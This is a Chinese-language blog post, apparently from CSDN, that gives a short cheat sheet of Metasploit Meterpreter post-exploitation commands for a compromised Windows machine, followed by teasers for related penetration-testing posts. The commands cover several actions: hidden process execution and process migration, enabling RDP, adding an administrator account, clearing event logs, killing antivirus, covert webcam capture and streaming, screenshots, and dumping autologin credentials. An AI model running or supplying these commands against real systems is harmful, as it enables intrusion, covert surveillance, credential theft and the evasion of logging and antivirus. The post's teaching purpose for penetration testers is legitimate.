后渗透阶段

最新推荐文章于 2025-02-20 13:54:52 发布
最新推荐文章于 2025-02-20 13:54:52 发布
阅读量399 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/s0mor/article/details/99646089
本文详细介绍了一系列渗透测试操作,包括消息框弹出、进程迁移、执行指定程序、启用远程桌面、添加管理员账号、清除日志、系统信息查看、关闭目标计算机、杀软禁用、摄像头扫描与控制、用户枚举及屏幕抓取等高级技术手段。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

弹消息框

msg /server:127.0.0.1 * "hello"

进程迁移

手动迁移:

查看进程ps
获取meterpreter进程PID getpid
迁移到指定PID进程中migrate 1234

自动迁移
run post/windows/manage/migrate

运行进程

用execute在目标系统中执行指定的程序:

execute -f /usr/test.exe [options]

可选参数:
-H:创建隐藏进程

启用RDP

run post/windows/manage/enable_rdp

添加管理员账号

run getgui -u hack -p hack

清除日志

clearev

查看系统信息 sysinfo

查看是否为虚拟机 run post/windows/gather/checkvm

关闭目标机 shutdown

查看运行时间 idletime

关闭杀软 run post/windows/manage/killav

扫描摄像头: webcam_list

抓拍照片:(保存在root目录下)webcam_snap

直播模式:webcam_stream 访问返回的网址

列举已登录的用户run post/windows/gather/enum_logged_on_users

抓取自动登录的用户名密码

run windows/gather/credentials/windows_autologin

抓取屏幕
screenshot

load espia

screengrab
渗透阶段的信息披露手法
不忘初心,护天下安全!
05-06 442
一、披露 披露是包括允许攻击者获得有关系统和内部网络的知识的技术。 二、获取浏览器数据 在后渗透阶段,获得权限后需要搜集目标系统的信息。信息越全面,越有助于进一步的渗透。对于Windows系统,用户浏览器往往包含有价值的信息。 (一)Chrome数据 1. DPAPI 全称Data Protection Application Programming Interface 作为Windows系统的一个数据保护接口被广泛使用,主要用于保护加密的数据,常见应用:EFS文件加密、无线连接密码、Outlo
第二十六天 后渗透阶段
weixin_46653764的博客
07-25 540
拿到普通权限后,开始后渗透阶段 这里我用kali和win7来练习,先在kali用msf生成木马植入win7中拿到普通权限 首先先在kali上生成木马↓ △msfvenom的用法↓ 利用msfvenom制作.exe 文件,然后发送到靶机Windows上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机 下面是使用msfvenom的部分参数,是比较常用的 -p 选择一个payload -l 载荷列表 -f 生成的文件格式 -e 编码方式 -i .
渗透测试-后渗透阶段.pdf
02-25
《Metasploit渗透测试魔鬼训练营》读书笔记文档,是在我看书的过程中对书中理论和一些实践的总结。
渗透测试笔记总结(十)——后渗透阶段
Leon~博客
02-26 2594
目录 一、后渗透阶段 二、后渗透的命令 三、meterpreter命令 1、基本命令 2、文件系统命令 3、网络命令 4、系统命令 四、后渗透模块 1、后渗透模块的使用方法 2、使用实例 五、meterpreter的应用 1、植入后门远程控制 2、提权 3、信息窃取 4...
渗透攻击阶段 PTES
hkzck的博客
06-28 616
渗透攻击阶段。拿到客户一些系统的管理权限后,由此为“跳板”,实现内网“漫游”。在这个过程中,有经验的大牛,能在信息有限的情况下,识别出关键信息基础设施,找到客户组织最有价值的信息和资产,并展示出对重要业务影响的攻击路径。 【Key Words】后渗透、关键信息基础设施、内网漫游 你和甲方爸爸oppo谈完【前期交互阶段完成】, 其实早就偷偷收集情报了,过了两天情报收集完成【情报收集阶段完成】, 你看到了登陆界面,一顿奇(xia)思(ji)妙(er)想,给出了威胁建模报告【威胁建模阶段完成】 .
渗透阶段的攻防对抗.pdf
08-15
在网络安全领域,后渗透阶段的攻防对抗是至关重要的环节,因为这关乎到攻击者是否能够成功扩大战果,以及防御者能否及时发现并抵御入侵。在这个阶段,黑客通常会试图深化对系统的控制,获取敏感信息,同时尽可能掩盖...
渗透阶段的网络攻防对抗.pptx
10-13
渗透阶段的网络攻防对抗.pptx
Metasploit后渗透阶段详解与命令使用
"该文档是基于《Metasploit渗透测试魔鬼训练营》的读书笔记,主要涵盖后渗透阶段的关键操作和Metasploit框架的使用。" 渗透测试是网络安全领域的重要环节,它模拟黑客攻击行为来评估系统的安全性。一旦在渗透测试中...
小白日记20:kali渗透测试之后渗透测试阶段(一)--上传工具
ZiXuanFY的博客
09-22 5100
渗透测试阶段--上传工具 为防止管理员将漏洞补上后,我们无法再通过该漏洞控制对方主机,所以需要进行后渗透测试阶段 1、上传各种工具 2、提权:为了全面控制目标系统 3、擦除攻击痕迹:防止管理员通过日志溯源追踪,发现攻击源头【除了系统日记,应用程序也会有自己的日志信息】 ##删除系统日记和应用程序日记 例如:SLmail中 4、安装后门程序
Metasploit——后渗透测试阶段
m0_62063669的博客
08-14 2420
伪造一个AP,诱使别人来连这个AP,别人连了这个AP访问Internet上其他网站服务器的时候,因为流量经过这个AP,就可以在这个AP上嗅探抓包,因为有msf,可以在AP上启动一些漏洞利用模块,然后目标的流量经过AP,一旦发现目标浏览器有漏洞,通过流量分析可以判断浏览器版本是否有漏洞,尝试往流量里注入漏洞利用代码(插入到返回的流量中),一旦返回流量中 收到后有漏洞利用代码,恰好浏览器有对应漏洞,那么代码就会执行,创建新的meterpreter shell。所以设置为LHOST设置为win7的IP。.....
渗透
qq_53086690的博客
04-28 758
渗透攻击:信息收集   成功对目标机器攻击渗透之后还可以做很多有趣的事情。Metasploit提供了一个非常请打的后渗透工具–Meterpreter,该工具有很多功能。使后续的渗透变的容易。Meerrerer特点如下: 纯内存工作模式不需要对磁盘进行任何写入操作 使用加密通信协议,而且可以同时与几个新到通信 。 在被攻击进程内工作不需要创建新的进程。 易于在多进程之间迁移。 进程迁移 刚获得Metrpreter Shell时,该Shell是极其脆弱的,例如攻击者可以利用浏览器漏洞攻陷目标机器,但是攻击
渗透(一)
热门推荐
Y-Y-K的博客
04-15 1万+
一.前言 本文及以后系列仅限于针对小白的学习,首先我们先大体了解一下我们要做的渗透到底有哪些,渗透包括但不限于前端渗透(web安全),后渗透及内网渗透,此系列为后渗透的讲解。 二.什么是后渗透 我们了解到前端安全包括了SQL注入,任意文件上传,XSS,CSRF,逻辑漏洞,跨域漏洞等等,我们知道我们都想将这些漏洞加以利用或组合来进行getshell的。在这里我们再区分一下getshell...
渗透测试全面解析:技术、方法与实践,从零基础到精通,收藏这篇就够了!
最新发布
yy1715713348的博客
02-20 885
渗透测试(Post-exploitation)是指在渗透测试过程中,攻击者已成功入侵目标系统,通过对已受威胁系统的深入分析和攻击,揭示潜在的安全风险,从而评估系统的整体安全性能。
渗透攻防工具篇-后渗透阶段的Meterpreter
qdslg的专栏
07-29 4463
文章作者  zusheng 文章来源  i春秋原创奖励计划 时间        2016年8月23日 14:38:43 前言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。目录第一节 初识Meterpreter 1.1、什么是Meterpret...
渗透<一>
qq_43122583的博客
04-21 275
目录前言一、权限提升1. 提高程序运行级别2. UAC绕过3. 利用提权漏洞进行提权二、信息收集三、内网渗透四、后门植入 前言 实验环境: kali linux win7 获取普通session,开启数据库服务 生成payload msf.exe 开启msfconsle 使用监听模块,并配置 执行exploit 使用python开启SimpleHttpServer 在win7的浏览器中把msf.exe下载下来 双击桌面的msf执行,kali中监听到了一个session,并进入一个低权限的
渗透 1
qq_42364315的博客
07-22 2393
前言: 渗透的本质是信息搜集,信息的搜集整理为后续的情报跟进提供了保证。 后渗透的本质是权限把控,权限把控为后渗透提供了以牺牲时间换取空间的强大基础 首先,后渗透是什么意思?难道渗透还分前渗透和后渗透? 当然不是,后渗透渗透测试之后的一系列扫尾工作,当你通过“增删改查”等操作(任意文件上传, 任意文件下载, 任意文件删除 任意文件读取)拿到webshell之后再次提权拿到系统权限之后的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值